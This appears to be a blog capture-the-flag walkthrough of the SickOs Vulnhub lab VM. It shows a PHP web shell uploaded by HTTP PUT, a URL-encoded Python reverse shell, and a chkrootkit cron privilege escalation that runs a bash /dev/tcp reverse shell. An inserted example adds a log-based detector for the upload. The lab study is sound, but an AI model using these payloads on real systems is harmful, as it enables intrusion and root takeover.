Sickos

Vulnhub virtual machine and OSCP prep box. Enumerating the web server's allowed OPTIONS led to a PUT upload of a reverse shell. Privilege escalation required a pivot through chkrootkit and a reverse shell executed by crontab.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use the information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Locate VM on network

netdiscover -r 192.168.56.0/24

Target: 192.168.56.104

Enumeration

Nmap Scan

nmap -sV -sC -oA nmap/sickos 192.168.56.104

Investigate the HTTP server at http://192.168.56.104

Page source:

blow.jpg downloaded and checked for steganography

file blow.jpg

strings blow.jpg

Gobuster HTTP server

gobuster -u http://192.168.56.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-webservices.out

/test directory found, along with another directory that looks different from the rest.

/test Directory

lighttpd/1.4.28 identified

Searchsploit

searchsploit lighttpd

“mod userdir Information Disclosure” looks interesting; download it locally and view it.

Security focus website

This might be worth investigating here in the future.

Checking the webserver OPTIONS of /test

curl -v -X OPTIONS http://192.168.56.104/test

The web server allows PUT. We can send a quick one-liner to it and see if it executes.

RCE

PUT shell.php on webserver

curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://192.168.216.128/test/shell.php

Upload completed!

The file is indeed on the remote box; now test for code execution.

192.168.56.104/test/shell.php?cmd=whoami
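The defender's view of the same chain, as an added example that is not part of the original post: a small Python check that walks web server access logs for a successful PUT of a script file followed by a request to that file carrying a command parameter. The log lines are constructed samples in Common Log Format that mirror the walkthrough's traffic; the regex assumes that prefix, so adjust it for other access-log formats.

```python
# Added example (not from the original post): flag the PUT-upload-then-execute
# pattern in web server access logs. SAMPLE_LOG holds constructed lines in
# Common Log Format; the IPs and paths mirror the walkthrough above.
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx", ".cgi", ".pl")

SAMPLE_LOG = """\
192.168.56.101 - - [10/Jan/2018:10:01:02 +0000] "OPTIONS /test HTTP/1.1" 200 0
192.168.56.101 - - [10/Jan/2018:10:01:09 +0000] "PUT /test/shell.php HTTP/1.1" 201 0
192.168.56.101 - - [10/Jan/2018:10:01:15 +0000] "GET /test/shell.php?cmd=whoami HTTP/1.1" 200 10
192.168.56.50 - - [10/Jan/2018:10:02:00 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0
192.168.56.50 - - [10/Jan/2018:10:02:30 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512
192.168.56.77 - - [10/Jan/2018:10:03:00 +0000] "PUT /test/x.php HTTP/1.1" 403 0
"""

def find_webshell_uploads(log_text):
    """Return alerts as (kind, client_ip, path) tuples: one for every
    successful PUT of a script file, and one for every later GET/POST to
    such a file that carries a command-style query parameter."""
    uploaded = set()   # script paths written through a successful PUT
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue           # not CLF; skip rather than guess
        parts = urlsplit(m["target"])
        path, status = parts.path, int(m["status"])
        if m["method"] == "PUT" and 200 <= status < 300 and path.lower().endswith(SCRIPT_EXT):
            uploaded.add(path)
            alerts.append(("script_upload_via_put", m["ip"], path))
        elif path in uploaded and m["method"] in ("GET", "POST"):
            params = parse_qs(parts.query)
            if any(k.lower() in ("cmd", "c", "exec", "command") for k in params):
                alerts.append(("webshell_command", m["ip"], path))
    return alerts

if __name__ == "__main__":
    for alert in find_webshell_uploads(SAMPLE_LOG):
        print(*alert)
```

The rejected PUT (403) and the non-script PUT produce no alert, which keeps the check focused on uploads that actually landed a script.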

For the reverse shell, I used the standard pentestmonkey reverse shell and URL-encoded it. I did encounter issues with the port, which led me to believe we might be dealing with some type of firewall internally.

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.56.101%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

We have a partial shell now and just need to upgrade it.

Upgrade to tty

python -c 'import pty; pty.spawn("/bin/bash")'
press Ctrl+Z
stty raw -echo
fg (enter)

cat /etc/passwd

Checking for chkrootkit:

Priv-Esc

Version check

chkrootkit -V

Luckily there is an exploit for version 0.49, found at: https://www.exploit-db.com/exploits/33899/

Priv-esc is accomplished by writing an update file in /tmp, which the cron-scheduled chkrootkit run executes as root.

Root

Create the update file. We need to push this reverse shell over port 443 to bypass the firewall.

printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.56.101/443 0>&1\n' >> /tmp/update

Next, make it executable (run from within /tmp):

chmod 777 update

Wait for the callback on port 443.

Bring me the root!

-exec